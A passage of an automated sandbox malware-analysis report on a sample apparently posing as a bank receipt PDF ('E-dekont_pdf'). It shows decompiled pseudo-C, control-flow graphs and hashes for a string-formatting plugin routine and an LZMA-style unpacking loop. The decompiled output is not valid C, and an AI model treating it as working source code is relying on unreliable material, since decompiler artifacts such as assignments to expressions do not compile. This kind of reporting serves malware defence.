                                                                                              control_flow_graph 964 6f132209-6f132226 call 6f1312f8 967 6f132228-6f13222d 964->967 968 6f132233 967->968 969 6f13222f-6f132231 967->969 970 6f132235-6f13223c 968->970 969->970 971 6f132242 970->971 972 6f1322d9-6f1322dd 970->972 975 6f132253-6f132257 971->975 976 6f132273-6f13227e call 6f13149e 971->976 977 6f132280-6f1322a4 MultiByteToWideChar 971->977 978 6f1322b7-6f1322c6 lstrcpynW 971->978 979 6f1322a6-6f1322b5 StringFromGUID2 971->979 980 6f132249-6f13224e 971->980 981 6f1322c8 971->981 973 6f1322f7-6f1322fc 972->973 974 6f1322df-6f1322e6 972->974 985 6f132319-6f13231f 973->985 986 6f1322fe-6f132301 973->986 983 6f1322e8-6f1322ec 974->983 984 6f1322ee-6f1322f1 GlobalFree 974->984 987 6f132270-6f132271 975->987 988 6f132259-6f132269 975->988 990 6f1322d6 976->990 977->972 978->972 979->972 980->972 982 6f1322ca-6f1322d0 wsprintfW 981->982 982->990 983->973 983->984 984->973 985->967 991 6f132325-6f13232f GlobalFree 985->991 992 6f132303-6f132309 call 6f1315eb 986->992 993 6f13230b-6f13230d 986->993 987->982 988->987 990->972 999 6f132318 992->999 993->985 996 6f13230f-6f132317 call 6f131638 993->996 996->999 999->985
                                                                                              C-Code - Quality: 70%
                                                                                              			E6F132209(intOrPtr* _a4) {
				intOrPtr* _t23;
				signed int _t24;
				intOrPtr _t25;
				void* _t26;
				intOrPtr _t33;
				void* _t39;
				void* _t42;

				_t39 = E6F1312F8();
				_t23 = _a4;
				_t33 =  *((intOrPtr*)(_t23 + 0x1014));
				_t42 = (_t33 + 0x81 << 5) + _t23;
				do {
					if( *((intOrPtr*)(_t42 - 4)) >= 0) {
					}
					_t24 =  *(_t42 - 8) & 0x000000ff;
					if(_t24 <= 7) {
						switch( *((intOrPtr*)(_t24 * 4 +  &M6F132331))) {
							case 0:
								 *_t39 = 0;
								goto L17;
							case 1:
								__edx =  *__edx;
								if(__ecx > 0) {
									__ecx = __ecx - 1;
									__ecx = __ecx *  *(0x6f134064 + __eax * 4);
									asm("sbb eax, eax");
									__edx = __edx &  *(0x6f134084 + __eax * 4);
								}
								_push(__edx);
								goto L15;
							case 2:
								_push(__edi);
								_push(__edx[1]);
								_push( *__edx);
								__eax = E6F13149E(__ecx);
								goto L16;
							case 3:
								__ecx =  *0x6f135040;
								__ecx - 1 = MultiByteToWideChar(0, 0,  *__edx, __ecx, __edi, __ecx - 1);
								__eax =  *0x6f135040;
								__ecx = 0;
								 *((short*)(__edi + __eax * 2 - 2)) = __cx;
								goto L17;
							case 4:
								__eax = lstrcpynW(__edi,  *__edx,  *0x6f135040);
								goto L17;
							case 5:
								_push( *0x6f135040);
								_push(__edi);
								_push( *__edx);
								__imp__StringFromGUID2();
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfW(__edi, 0x6f134058);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					if( *(_t42 + 0x14) != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t42 - 4)) > 0)) {
						GlobalFree( *(_t42 + 0x14)); // executed
					}
					_t25 =  *((intOrPtr*)(_t42 + 0xc));
					if(_t25 != 0) {
						if(_t25 != 0xffffffff) {
							if(_t25 > 0) {
								E6F131638(_t25 - 1, _t39);
								goto L26;
							}
						} else {
							E6F1315EB(_t39);
							L26:
						}
					}
					_t42 = _t42 - 0x20;
					_t33 = _t33 - 1;
				} while (_t33 >= 0);
				_t26 = GlobalFree(_t39); // executed
				return _t26;
			}










                                                                                              0x6f132211
                                                                                              0x6f132213
                                                                                              0x6f132217
                                                                                              0x6f132226
                                                                                              0x6f132228
                                                                                              0x6f13222d
                                                                                              0x6f13222d
                                                                                              0x6f132235
                                                                                              0x6f13223c
                                                                                              0x6f132242
                                                                                              0x00000000
                                                                                              0x6f13224b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f132253
                                                                                              0x6f132257
                                                                                              0x6f132259
                                                                                              0x6f13225a
                                                                                              0x6f132265
                                                                                              0x6f132269
                                                                                              0x6f132269
                                                                                              0x6f132270
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f132273
                                                                                              0x6f132274
                                                                                              0x6f132277
                                                                                              0x6f132279
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f132280
                                                                                              0x6f132292
                                                                                              0x6f132298
                                                                                              0x6f13229d
                                                                                              0x6f13229f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1322c0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1322a6
                                                                                              0x6f1322ac
                                                                                              0x6f1322ad
                                                                                              0x6f1322af
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1322c8
                                                                                              0x6f1322ca
                                                                                              0x6f1322d0
                                                                                              0x6f1322d6
                                                                                              0x6f1322d6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f132242
                                                                                              0x6f1322d9
                                                                                              0x6f1322dd
                                                                                              0x6f1322f1
                                                                                              0x6f1322f1
                                                                                              0x6f1322f7
                                                                                              0x6f1322fc
                                                                                              0x6f132301
                                                                                              0x6f13230d
                                                                                              0x6f132312
                                                                                              0x00000000
                                                                                              0x6f132317
                                                                                              0x6f132303
                                                                                              0x6f132304
                                                                                              0x6f132318
                                                                                              0x6f132318
                                                                                              0x6f132301
                                                                                              0x6f132319
                                                                                              0x6f13231c
                                                                                              0x6f13231c
                                                                                              0x6f132326
                                                                                              0x6f13232f

                                                                                              APIs
                                                                                                • Part of subcall function 6F1312F8: GlobalAlloc.KERNELBASE(00000040,?,6F1311C4,-000000A0), ref: 6F131302
                                                                                              • GlobalFree.KERNELBASE(00000000), ref: 6F1322F1
                                                                                              • GlobalFree.KERNELBASE(00000000), ref: 6F132326
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77216589547.000000006F131000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F130000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77216556616.000000006F130000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77216631683.000000006F134000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77216670009.000000006F136000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_6f130000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$Free$Alloc
                                                                                              • String ID:
                                                                                              • API String ID: 1780285237-0
                                                                                              • Opcode ID: 14c2776556251889d927b6e884c8617205491b8c366730a5499e011c9f5dcc61
                                                                                              • Instruction ID: 17d50711cc58aded616ae4a89a891fd7e1adfc71f062e1e3d9d015cafe57aa1b
                                                                                              • Opcode Fuzzy Hash: 14c2776556251889d927b6e884c8617205491b8c366730a5499e011c9f5dcc61
                                                                                              • Instruction Fuzzy Hash: 33310233A046A1DBDB25AF68CD44EAA7BB4FF4A7A5B01016DF401D6190C733A474CBE0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406BB0 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 198COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1001 406bb0-406bd3 1002 406bd5-406bd8 1001->1002 1003 406bdd-406be0 1001->1003 1004 4075fd-407601 1002->1004 1005 406be3-406bec 1003->1005 1006 406bf2 1005->1006 1007 4075fa 1005->1007 1008 406bf9-406bfd 1006->1008 1009 406d39-4073e0 1006->1009 1010 406c9e-406ca2 1006->1010 1011 406d0e-406d12 1006->1011 1007->1004 1017 406c03-406c10 1008->1017 1018 4075e5-4075f8 1008->1018 1020 4073e2-4073f8 1009->1020 1021 4073fa-407410 1009->1021 1015 406ca8-406cc1 1010->1015 1016 40754e-407558 1010->1016 1012 406d18-406d2c 1011->1012 1013 40755d-407567 1011->1013 1019 406d2f-406d37 1012->1019 1013->1018 1022 406cc4-406cc8 1015->1022 1016->1018 1017->1007 1023 406c16-406c5c 1017->1023 1018->1004 1019->1009 1019->1011 1026 407413-40741a 1020->1026 1021->1026 1022->1010 1027 406cca-406cd0 1022->1027 1024 406c84-406c86 1023->1024 1025 406c5e-406c62 1023->1025 1030 406c94-406c9c 1024->1030 1031 406c88-406c92 1024->1031 1028 406c64-406c67 GlobalFree 1025->1028 1029 406c6d-406c7b GlobalAlloc 1025->1029 1032 407441-40744d 1026->1032 1033 40741c-407420 1026->1033 1034 406cd2-406cd9 1027->1034 1035 406cfa-406d0c 1027->1035 1028->1029 1029->1007 1036 406c81 1029->1036 1030->1022 1031->1030 1031->1031 1032->1005 1037 407426-40743e 1033->1037 1038 4075cf-4075d9 1033->1038 1040 406ce4-406cf4 GlobalAlloc 1034->1040 1041 406cdb-406cde GlobalFree 1034->1041 1035->1019 1036->1024 1037->1032 1038->1018 1040->1007 1040->1035 1041->1040
                                                                                              C-Code - Quality: 98%
                                                                                              			E00406BB0(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_push("true");
				_pop(_t572);
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									__ebx = __edx + 1;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__ebx = __edx + 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
